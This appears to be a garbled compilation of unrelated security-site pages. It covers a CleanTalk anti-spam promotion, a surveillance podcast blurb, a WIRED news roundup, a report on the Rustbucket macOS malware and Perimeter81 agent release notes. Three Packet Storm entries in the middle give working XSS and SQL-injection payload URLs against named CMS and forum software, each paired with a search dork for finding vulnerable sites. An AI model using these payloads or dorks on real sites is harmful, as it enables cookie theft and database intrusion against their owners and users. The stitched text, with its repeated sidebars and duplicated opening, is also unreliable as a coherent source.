Every website owner or webmaster grapples with the issue of spam on their website forms. The volume of spam can be so overwhelming that finding useful information within it becomes quite challenging. What exacerbates this issue is that spam can populate your public pages, appearing in comments and reviews. You likely understand how this can damage your website's reputation, affect search results

Every website owner or webmaster grapples with the issue of spam on their website forms. The volume of spam can be so overwhelming that finding useful information within it becomes quite challenging. What exacerbates this issue is that spam can populate your public pages, appearing in comments and reviews. You likely understand how this can damage your website's reputation, affect search results, overload your web server, and divert your focus from website development.

Website owners and webmasters need a solution to this problem. When selecting an anti-spam solution, the following requirements should be taken into account:

1.  The solution must operate automatically, eliminating the need for manual spam checks.
2.  It should provide a quick and efficient method of accuracy control.
3.  It must be universal, protecting all website forms simultaneously.
4.  It should be easy and straightforward to install and set up.
5.  It should not require any extra steps from your visitors, ensuring they do not have to confirm that they are humans, not bots.

**CleanTalk Anti-Spam Solution**

CleanTalk Anti-Spam is a cloud-based tool designed to block various types of spam that website administrators encounter daily. This includes spam in comments, contact forms, signups, registrations, subscriptions, newsletters, and WooCommerce reviews and checkouts.

This solution delivers the following benefits:

*   All spam-related computations and decisions are processed on remote servers, reducing the load on your web servers thanks to cloud technology.
*   The Service Dashboard provides detailed insights into website requests, equipping you with tools to manage service features. It clearly indicates whether a request was spam.
*   The plugin can be installed and set up easily on any website in just a few minutes.
*   With this single solution, all forms on your website are safeguarded.
*   Spam checks are conducted without interrupting your site visitors, requiring no action on their part.

Several important service features require separate mentions:

*   **SpamFireWall** - This feature blocks the most actively spamming bots before they can visit your website.
*   **Email Address Validation** - This function verifies the authenticity of an email address in real time.
*   **Encode Contact Data** - This feature encodes the email addresses displayed on your public pages, protecting them from being parsed by bots.

**Let's go through an example on WordPress**

**1)** To install the plugin: Navigate to your WordPress Dashboard → Click on 'Plugins,' then 'Add New' → In the search field, type 'CleanTalk.'

**2)** Install the plugin and activate it. You will be automatically redirected to the plugin's settings.

**3)** Click on 'Get Access Key Automatically,' then save the settings. At this point, a CleanTalk account will be created for you. The account credentials will be sent to your email.

That's it! Your website now has protection from spam. Any spam attempts will be promptly blocked.

**Testing the Protection on the Contact Form by WPForms as an Example**

To test the form, open the website in a new Incognito tab. This is necessary because the plugin doesn't register actions performed by the admin.

Navigate to the page containing the contact form and enter the test email address \[ s@cleantalk.org \]. Click the "Submit" button to send the data. If the data is blocked, a corresponding message should appear.

The CleanTalk plugin captures the website request made via the contact form and forwards the gathered data to the CleanTalk Cloud for processing. In the Cloud, a decision is made regarding the "Spam/Not Spam" status. This status is then relayed back to the plugin, which either forwards the form data to the website backend or blocks it. This request data gets logged in your Anti-Spam Log within your service Dashboard.

To access your Anti-Spam Log, either go directly to your Dashboard or open the plugin settings and click the "Click here to get the Anti-Spam statistics" button.

**Service Dashboard Features**

The Anti-Spam Log - This tool gives you insight into all website requests processed by the CleanTalk Cloud, including their status and additional details.

Each request includes the following:

*   Status — Denied or Approved
*   Date and time of request
*   Sender's username, IP, and email addresses
*   Spam activity linked to these IP and email addresses
*   Email address validation result — Fake or Real

You can click on "Details" under each request to access complete information.

This feature ensures that you never miss out on any data and allows you to monitor the accuracy of the filtering process. Another notable feature of the CleanTalk plugin is that it captures data even when a visitor makes a typo or fails the built-in form validation, making the data available in your Anti-Spam Log.

The Dashboard also allows you to:

*   Manage your list of protected websites.
*   Update your account settings.
*   View summary statistics.
*   Manage Personal Lists of IPs, Emails, Stop-Words, Countries, and Languages.

These features make our Anti-Spam Service a robust solution for spam protection and shielding your website from unwanted messages or requests.

**Conclusion**

A robust spam filter is essential for your website. CleanTalk Anti-Spam provides a one-week free trial, allowing you to verify its effectiveness in managing spam on your site. The service begins at $12 annually, and unlimited website usage is available for $25 per month. Rather than manually moderating and reviewing your messages, delegate this task to CleanTalk.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Improve Your Security WordPress Spam Protection With CleanTalk Anti-Spam

Categories: Podcast
This week on Lock and Code, we speak with Matthew Guargilia about the NSA's broad powers to sweep up Americans' emails, DMs, messages, and all manner of digital communications.



(Read more...)




The post Of sharks, surveillance, and spied-on emails: This is Section 702, with Matthew Guariglia appeared first on Malwarebytes Labs.

In the United States, when the police want to conduct a search on a suspected criminal, they must first obtain a search warrant. It is one of the foundational rights given to US persons under the Constitution, and a concept that has helped create the very idea of a right to privacy at home and online. 

But sometimes, individualized warrants are never issued, never asked for, never really needed, depending on which government agency is conducting the surveillance, and for what reason. Every year, countless emails, social media DMs, and likely mobile messages are swept up by the US National Security Agency—even if those communications involve a US person—without any significant warrant requirement. Those digital communications can be searched by the FBI. The information the FBI gleans from those searches can be used can be used to prosecute Americans for crimes. And when the NSA or FBI make mistakes—which they do—there is little oversight. 

This is surveillance under a law and authority called Section 702 of the FISA Amendments Act. 

The law and the regime it has enabled are opaque. There are definitions for "collection" of digital communications, for "queries" and "batch queries," rules for which government agency can ask for what type of intelligence, references to types of searches that were allegedly ended several years ago, "programs" that determine how the NSA grabs digital communications—by requesting them from companies or by directly tapping into the very cables that carry the Internet across the globe—and an entire, secret court that, only has rarely released its opinions to the public. 

Today, on the Lock and Code podcast, with host David Ruiz, we speak with Electronic Frontier Foundation Senior Policy Analyst Matthew Guariglia about what the NSA can grab online, whether its agents can read that information and who they can share it with, and how a database that was ostensibly created to monitor foreign intelligence operations became a tool for investigating Americans at home. 

As Guariglia explains:

> "In the United States, if you collect any amount of data, eventually law enforcement will come for it, and this includes data that is collected by intelligence communities."

Tune in today.

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use. 

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

Of sharks, surveillance, and spied-on emails: This is Section 702, with Matthew Guariglia

Strawberry version 1.1.9 suffers from a cross site scripting vulnerability.

**Strawberry 1.1.9 Cross Site Scripting**

Posted Jul 2, 2023

Authored by indoushka

Strawberry version 1.1.9 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 5006ad4fe5ee6631967fbcda59c50822e4f6cf4db227a33b6f3fba8640dbb942

Download | Favorite | View

**Strawberry 1.1.9 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Strawberry 1.1.9 XSS Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : https://cutenewsru.sourceforge.io/strawberry/                                                                      |  | # Dork      : "Powered by Strawberry 1.1.9"                                                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /content/index.php/"onmouseover%3d'prompt(document.cookies)'bad%3d"[+] http://127.0.0.1/dverekomondoorcom/content/index.php/"onmouseover%3d'prompt(document.cookies)'bad%3d"Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |        =======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,554)
*   Arbitrary (16,117)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,203)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,328)
*   DoS (23,288)
*   Encryption (2,363)
*   Exploit (51,405)
*   File Inclusion (4,202)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,742)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,412)
*   Magazine (586)
*   Overflow (12,627)
*   Perl (1,423)
*   PHP (5,134)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,582)
*   Root (3,573)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,861)
*   Shell (3,168)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,254)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,654)
*   Web (9,600)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,787)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,782)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,065)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,707)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

Strawberry 1.1.9 Cross Site Scripting

phpFK version 9.2 Beta suffers from cross site scripting and remote SQL injection vulnerabilities.

**phpFK 9.2 Beta Cross Site Scripting / SQL Injection**

**phpFK 9.2 Beta Cross Site Scripting / SQL Injection**

Posted Jul 2, 2023

Authored by indoushka

phpFK version 9.2 Beta suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection

SHA-256 | 09fef1efe957f866ce2e4d01724c95e85523e37eb341c2135635c17435c8b42c

Download | Favorite | View

**phpFK 9.2 Beta Cross Site Scripting / SQL Injection**

    ====================================================================================================================================| # Title     : phpFK v9.2 Beta version SQLi + XSS Vulnerability                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0.(32-bit)                                              | | # Vendor    : https://www.frank-karau.de/demo-forum/                                                                             |  | # Dork      : Powered by: phpFK                                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /forum/thread.php?board=4&thema=349'"><svg/onload=prompt(/_indoushka_/);>{{7*7}}[+] http://127.0.0.1/forum/thread.php?board=4&thema=349%27%22%3E%3Csvg/onload=prompt(/_indoushka_/);%3E{{7*7}}Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,554)
*   Arbitrary (16,117)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,203)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,328)
*   DoS (23,288)
*   Encryption (2,363)
*   Exploit (51,405)
*   File Inclusion (4,202)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,742)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,412)
*   Magazine (586)
*   Overflow (12,627)
*   Perl (1,423)
*   PHP (5,134)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,582)
*   Root (3,573)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,861)
*   Shell (3,168)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,254)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,654)
*   Web (9,600)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,787)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,782)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,065)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,707)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

phpFK 9.2 Beta Cross Site Scripting / SQL Injection

ArabInfotech CMS version 2.0.1 suffers from a cross site scripting vulnerability.

**ArabInfotech CMS 2.0.1 Cross Site Scripting**

Posted Jul 2, 2023

Authored by indoushka

ArabInfotech CMS version 2.0.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 670bf364f2d7ff34656860436ff284c800f86d1d679b95be7803858c4d41549d

Download | Favorite | View

**ArabInfotech CMS 2.0.1 Cross Site Scripting**

    ====================================================================================================================================| # Title     : ArabInfotech CMS v 2.0.1 L.L.C Xss Vulnerability                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : http://www.editpubdz.com/                                                                                          |  | # Dork      : intext:"Powered By Editpub"                                                                                        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload : '"()%26%25<acx><script>alert(/indoushka/);</script>[+] http://127.0.0.1/www/reliancerecruiterscom/job-details.php?id=68%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,554)
*   Arbitrary (16,117)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,203)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,328)
*   DoS (23,288)
*   Encryption (2,363)
*   Exploit (51,405)
*   File Inclusion (4,202)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,742)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,412)
*   Magazine (586)
*   Overflow (12,627)
*   Perl (1,423)
*   PHP (5,134)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,582)
*   Root (3,573)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,861)
*   Shell (3,168)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,254)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,654)
*   Web (9,600)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,787)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,782)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,065)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,707)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

ArabInfotech CMS 2.0.1 Cross Site Scripting

Plus: Hackers knock out Russian military satellite communications, a spyware maker gets breached, and the SEC targets a victim company's CISO.

Amid exploding AI usage, the United States Senate is mulling legislation to regulate the development of artificial intelligence, but lawmakers' comments to WIRED this week indicate that Congress' abysmal track record on tech regulation may be doomed to repeat itself. Meanwhile, in the European Union, challenges filed under the EU's GDPR data law on Thursday allege that Pornhub has been collecting user data illegally.

We looked at a common air travel booking scam that can turn real—but not ticketed—flight reservations into cash grabs for cybercriminals. And tech companies have recently released an array of critical software updates that you should install on your devices right now. Some patches published in recent weeks from the company Progress Software patch flaws in the popular file transfer service MOVEit, which has been exploited by ransomware actors to spread malware and steal data from international companies, universities, and the US government.

If you want a digital hygiene project for the weekend, we have tips on how to make your chats and messaging more secure. And if you're craving a long read, WIRED went in-depth on the 1973 US National Personnel Records Center fire that destroyed 17 million military records and prompted a massive restoration effort.

And there's more. Each week, we round up the stories we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

On Tuesday, a 7-2 decision by the US Supreme Court reversed the conviction of a man who repeatedly threatened a stranger online. Justice Elena Kagan wrote in the majority opinion that First Amendment free speech protections require such cases to show that online harassers or cyberstalkers were aware that their digital abuse could be construed as threatening. Threats of violence are not protected by the First Amendment, but the court said prosecutors must show that a defendant “consciously disregarded a substantial risk that his communications would be viewed as threatening violence.” The offender in the case the court looked at, Billy Counterman of Colorado, had “moved to dismiss the charge on First Amendment grounds, arguing that his messages were not ‘true threats’ and therefore could not form the basis of a criminal prosecution.”

Counterman had persistently and repeatedly messaged a local singer he didn't know on Facebook over two years, and when she would block him he made new accounts to continue messaging her. Victims of online harassment and digital rights advocates warned following the decision that it creates a dangerous precedent to empower cyberstalkers. “The Court just handed stalkers and harassers, including of politicians, journalists, climate scientists, doctors advocating for vaccines, you name it, a new weapon,” Soraya Chemaly, director of the Women’s Media Center Speech Project, told the _Washington Post_.

A cyberattack caused a multiday outage this week of a Russian satellite communication system from Dozor-Teleport. The platform is broadly used, including by the Russian military. Ukrainian satellite communication infrastructure suffered a similar outage more than a year ago. Dozor’s parent company, Amtel Svyaz, also grappled with significant system outages this week. Multiple hackers claimed responsibility for the attacks, including some purporting to be hacktivists and others who said they were affiliated with the Russian private mercenary army Wagner Group. In addition to the outage, one of the entities claiming responsibility for the attack said it had stolen data from Dozor and published 700 files, including documents and images, to a leak site and Telegram.

The invasive phone monitoring app LetMeSpy said on June 21 that it was itself hacked. Attackers stole names, messages, call logs, and location data collected by the service, the company said. LetMeSpy is a Polish Android app that's used around the world to monitor thousands of people. The company's notice said that “a security incident occurred involving obtaining unauthorized access to the data of website users​​.”

Years after a Russian espionage campaign launched a devastating supply chain attack against software firm SolarWinds, the US Securities and Exchange Commission sent legal notices—known as “Wells notices”—to certain current and former Solarwinds employees. Such notices warn of potential securities law violations that could lead to civil enforcement action, but they rarely relate to cybersecurity incidents. Notably, one of the SolarWinds employees who received a notice is the company's current chief information security officer, Tim Brown, who was Solarwinds' head of security architecture at the time of the attack. Company CFO Barton Kalsu also received a notice. The situation is potentially significant as the US and other countries attempt to develop appropriate accountability mechanisms for high-ranking executives who preside over breaches and other security lapses. The fear among security professionals is often that individual penalties will simply discourage talented practitioners from taking top roles.

US Supreme Court Hands Cyberstalkers a First Amendment Victory

Researchers have pulled back the curtain on an updated version of an Apple macOS malware called Rustbucket that comes with improved capabilities to establish persistence and avoid detection by security software.
"This variant of Rustbucket, a malware family that targets macOS systems, adds persistence capabilities not previously observed," Elastic Security Labs researchers said in a report

Endpoint Security / Malware

Researchers have pulled back the curtain on an updated version of an Apple macOS malware called **Rustbucket** that comes with improved capabilities to establish persistence and avoid detection by security software.

"This variant of Rustbucket, a malware family that targets macOS systems, adds persistence capabilities not previously observed," Elastic Security Labs researchers said in a report published this week, adding it's "leveraging a dynamic network infrastructure methodology for command-and-control."

RustBucket is the work of a North Korean threat actor known as BlueNoroff, which is part of a larger intrusion set tracked under the name Lazarus Group, an elite hacking unit supervised by the Reconnaissance General Bureau (RGB), the country's primary intelligence agency.

The malware came to light in April 2023, when Jamf Threat Labs described it as an AppleScript-based backdoor capable of retrieving a second-stage payload from a remote server. Elastic is monitoring the activity as REF9135.

The second-stage malware, compiled in Swift, is designed to download from the command-and-control (C2) server the main malware, a Rust-based binary with features to gather extensive information as well as fetch and run additional Mach-O binaries or shell scripts on the compromised system.

It's the first instance of BlueNoroff malware specifically targeting macOS users, although a .NET version of RustBucket has since surfaced in the wild with a similar set of features.

"This recent Bluenoroff activity illustrates how intrusion sets turn to cross-platform language in their malware development efforts, further expanding their capabilities highly likely to broaden their victimology," French cybersecurity company Sekoia said in an analysis of the RustBucket campaign in late May 2023.

The infection chain consists of a macOS installer file that installs a backdoored, yet functional, PDF reader. A significant aspect of the attacks is that the malicious activity is triggered only when a weaponized PDF file is launched using the rogue PDF reader. Initial intrusion vector includes phishing emails, as well as employing bogus personas on social networks such as LinkedIn.

The observed attacks are highly targeted and focused on finance-related institutions in Asia, Europe, and the U.S., suggesting that the activity is geared towards illicit revenue generation to evade sanctions.

What makes the newly identified version notable is its unusual persistence mechanism and the use of dynamic DNS domain (docsend.linkpc\[.\]net) for command-and-control, alongside incorporating measures focused on remaining under the radar.

"In the case of this updated RUSTBUCKET sample, it establishes its own persistence by adding a plist file at the path /Users/<user>/Library/LaunchAgents/com.apple.systemupdate.plist, and it copies the malware's binary to the following path /Users/<user>/Library/Metadata/System Update," the researchers said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Beware: New 'Rustbucket' Malware Variant Targeting macOS Users

com.perimeter81.osx.HelperTool in Perimeter81 10.0.0.19 on macOS allows Local Privilege Escalation (to root) via shell metacharacters in usingCAPath.

Share feedback

Thanks for sharing your feedback!

**MacOS agent 10.0.0.19**

**May 7th, 2023**

**New Features:**

*   The agent now supports the new Exclude configuration option for Split Tunneling (so that all traffic except specific addresses will go through the tunnel).

**Resolved Issues:**

*   P81-23365 - Mac agent launching twice, 2 different instances running at the same time
*   P81-26071 - OpenVPN connection sometimes taking too long

**MacOS agent 9.0.1.9**

**New Features:**

*   You can now switch between protocols while the agent is connected to a network! Simply select a protocol in the Protocols tab to switch to it.
*   When the user session expires (according to the session length set by the administrator), the agent will be automatically logged out during local night time, in order to avoid disconnections during the workday. This applies to session lengths of 2 days and above.

**Enhancements:**

*   Logging improvements
*   Agent installation will be prevented on unsupported MacOS version 10.14 and below

**Resolved Issues:**

*   P81-18590 - On macOS 13.0, sometimes the quick access UI and Full agent UI were displayed simultaneously when changing networks
*   P81-20543 - Incorrect icon state after silent upgrade of the agent
*   P81-23034 - Agent disconnection after OS upgrade to Mac OS 13.2
*   P81-23462 - SWG Web Filtering not working when a rule is set with two custom URLs that one is contained within the other
*   P81-7337 - Agent logs show that user is using macOS 10.16 when it is actually a higher version

**MacOS agent 9.0.0.28**

**New Features:**

*   Secure Web Gateway (SWG) now includes Malware Protection! SWG users now have an additional layer of protection against malicious software, on top of the existing web filtering functionality. Malware Protection actively scans content before it reaches the user's browser, blocks multiple types of threats, and notifies the user. Admins can view logs of blocked malware in a new page under the Monitor and Logs section.

**Enhancements:**

*   Log file size decreased, implemented log rotation
*   Added support for long-life certificates for SDP sessions
*   Updated internal frameworks to support minimum target OS of 10.15
*   Improved SWG module behaviour, increased reliability of Proxy module
*   Improved memory usage of agent and fixed issues with memory leaks
*   Improved stability
*   Improved connectivity

**Resolved Issues:**  
P81-21296 - Fixed an issue related to the Disable Sign-out feature  
P81-22039 - Fixed issue when agent UI was out of sync with Daemon  
P81-14902 - Fixed Trusted Wired Network MAC address case-insensitive comparison

**MacOS agent 8.0.6.166**

**Resolved Issues:**  
P81-16293 - Excessive memory consumption when using SWG

**MacOS agent 8.0.6.163**

**New Features:**

*   The agent can now remain connected while P81 SDP backend is restarted/offline, for better connection stability

**Enhancements:**

*   Added additional logging events on VPN reconnection and Probe failure
*   In the Protocols section, relabeled 'Automatic' protocol to 'Default'
*   Improved mechanism for fetching Public IP
*   Increased shared codebase between MacOS and iOS agents for better compatibility

**Resolved Issues:**  
P81-12527, P81-12562 - Unplanned disconnections  
P81-12869, P81-6732 - Sporadically cannot login to the agent - 'your session was not established'  
P81-14787 - Routing table not updated on Split Tunneling update until user disconnects  
P81-13988 - Agent User Interface is cut off when it’s the rightmost icon in the macOS tray  
P81-7450 - Fixed sorting in Quick Access networks list  
P81-14953 - Install update prompt appears without user interaction  
P81-16096, P81-16864 - DPC failed although conditions passed, until reboot  
P81-16189, P81-16949 - While connecting to VPN on unsecured WiFi, Internet is unavailable for 40-60 seconds

**MacOS agent 8.0.5.143**

**New Features:**

*   New wake from sleep mechanism logic
*   Added 'Quit' button to the agent's quick-UI for easier access
*   Added 'Reset Agent' button to the loading screen if it does not connect within 60 seconds
*   Added 'Reset Agent' button to the full UI (under the Support tab) to provide the ability to reset the agent at any time

**Resolved Issues:**

*   P81-14321 - Infinite connection attempts
*   P81-14317 - The loading screen does not disapear
*   P81-13962 - Agent says it's connected but loses all Internet connectivity
*   P81-13257 - Possible command injection vector via DPC
*   P81-13188 - DPC stuck after machine reboot
*   P81-12978 - Proxy communication issue
*   P81-12749 - Presented with a "You have reached your pre-configured connection time limit" error
*   P81-12698 - DPC: Device Activity Log does not appears in web console at admission time, only after DPC scheduled recheck time (20 minutes)
*   P81-12360 - Agent log files take too much space (0.4 GB)
*   P81-7128 - The Device Activity log shows 'No Hostname' instead of the device name
*   P81-6628 - The user is not signed out properly after the agent receives a new token

**MacOS agent 8.0.4.132**

**New Features:**

*   Disable Sign-Out (enforce Always On) - this feature is being gradually rolled out and will be available to all customers in a few weeks. Requires this version of the agent and above.
*   Agent sign-out brute-force prevention
*   Allow admins to control whether using the internal DNS is enforced or not, in order to support co-existing with products that require control over DNS

**Enhancements:**

*   Agent version is now displayed before login, for easier troubleshooting
*   The Quit button has been re-added to the agent extended UI, allowing users to shut down the agent application and the Perimeter 81 service in case they need to
*   P81-11453 - SWG bootstrap certificate enhancement

**Resolved Issues:**

*   P81-13378 - Changing settings on the console would cause the agent to Reconnect
*   P81-12977 - RegionName always showed N/A
*   P81-12747, P81-12674, P81-12571, P81-12525, P81-12164 - Issues connencting after sleep
*   P81-12746 - Connectivity issue when using SWG
*   P81-12417, P81-12618 - Connectivity issues
*   P81-12560 - Sign-in failing to open browser
*   P81-12539, P81-12519 - Websites unreachable
*   P81-12536 - SWG rules issues
*   P81-12461 - Internet connection issue after session timeout
*   P81-12419 - Reconnection process takes too long
*   P81-12269 - Public IP stuck in "Refreshing" and losing Internet connectivity
*   P81-11170, P81-11171, P81-12807 - Internal log fixes
*   P81-6859 - Silent Upgrade improvements
*   P81-6467 - UI bugs
*   P81-11531 - Better handling of ProtocolFilters in regards to certificates
*   P81-12720 - SWG bug fixes

**MacOS agent 8.0.4.124**

**Enhancements:**

*   Changed MTU for Wireguard to 1380 to improve connectivity in low-MTU scenarios
    
*   The Perimeter 81 certificate is now installed only if using Secure Web Gateway. If needed, users are referred to a webpage on how to complete the certificate and add-on setup
    
*   'Start Minimized' removed from Settings screen
    

**Resolved Issues:**

P81-11830/P81-10601 Connection is not restored after sleep  
P81-11673 Sometimes the app Signed Out incorrectly  
P81-11251/P81-11163 Agent stuck with connect button not responding  
P81-11211 DNS fails after sleep on latest Mac version (Monterey 12.3)  
P81-11074/P81-10889 Constant disconnections  
P81-11071 Connection issue with IKE protocol  
P81-11035/P81-11034/P81-8381Connection issue with Wireguard  
P81-11027/P81-11026/P81-10631 Internet connection blocked/unstable  
P81-10922/P81-10916 After sleep, the agent is connected but there is no internet connectivity  
P81-10874 Sign In button not working after session timeout  
P81-10556 Network adaptor changing every several minutes  
P81-9987 Split tunneling configuration didn't updated till Agent reconnection  
P81-9804 Client generates certificate errors  
P81-8032 "Connected to Network" notification doesn't hide automatically  
P81-7340 After upgrading XPC between Daemons, Proxy is not starting  
P81-6312/P81-3930 "Private DNS" icon not displayed on network with "Regional Private DNS"  
P81-6080 Closed Mac agent pops up every time Firewall rule is changed

**MacOS agent 8.0.4.116**

Fixed Issues:

*   P81-9839/P81-9833/P81-9795 - App crash
*   P81-9794/P81-9493 Connection issue - agent stuck in 'Reconnecting'
*   P81-9500 Failed to connect while returning from sleep mode
*   P81-9181 Agent takes a while to reconnect after sleep
*   P81-9152 Sign Out pop-up header displayed incorrectly
*   P81-8233 Device Activity Log - MacBook still appears as Healthy even though found Not Healthy
*   P81-8048 Apple M1 Pro - Disconnect during Zoom
*   P81-7340 SWG - Proxy not starting after upgrading XPC between Daemons
*   P81-5273 .pkg error - 'The Package is unsigned'
*   P81-910 .pkg installer file - Unsupported file format in MobileIron
*   P81-8236 Icons for Support, Settings, Sign Out are blurred

New features:

*   P81-9985 When installing using pkg file, the P81 certificate will not be installed unless specified by admin
*   P81-7551 The agent now allows admins to pre-populate the workspace value during installation via CLI.

**MacOS agent 8.0.4.108**

Fixed Issues:

*   P81-6326 - Failed to login after agent upgrade.
*   P81-4795 - DNS lost randomly when using split tunneling + custom DNS.
*   P81-7608 - IPv6 behavior is unpredictable.
*   P81-5029 - Improved messaging when pre-configured connection time limit is reached.
*   P81-2455 - agent UI pops up upon changing firewall rules.
*   P81-5034 - renamed 'diagnose issues' button to 'Send logs to support'.

New Features:

*   The Perimeter 81 agent now runs as a service in the background! There is no need to keep the agent UI open - it is always up and available via an icon in the system tray.
*   Connectivity and stability have been improved.
*   The agent now has a brand new “quick access” UI, which allows you to perform most operations from a single screen by clicking on the tray icon. The classic UI is still available, and can still be accessed in order to configure settings, contact support etc.
*   This agent version supports Secure Web Gateway (SWG).

**MacOS agent 7.0.3.37**

Fixed issues:

*   P81-2389 - Helper tool installation requires admin permissions
*   P81-5385 - Crash on changing networks while OpenVPN connected on TWN
*   P81-5332 - Post connection loss authentication issue
*   P81-4796 - Correction of description for Automatic Protocol
*   P81-4764 - Agent stuck in reconnecting when coming out of sleep mode
*   P81-4368 - Agent stuck in Reconnecting state

New features:

*   P81-5029 - Improve the output message after "Automatically log out Client "
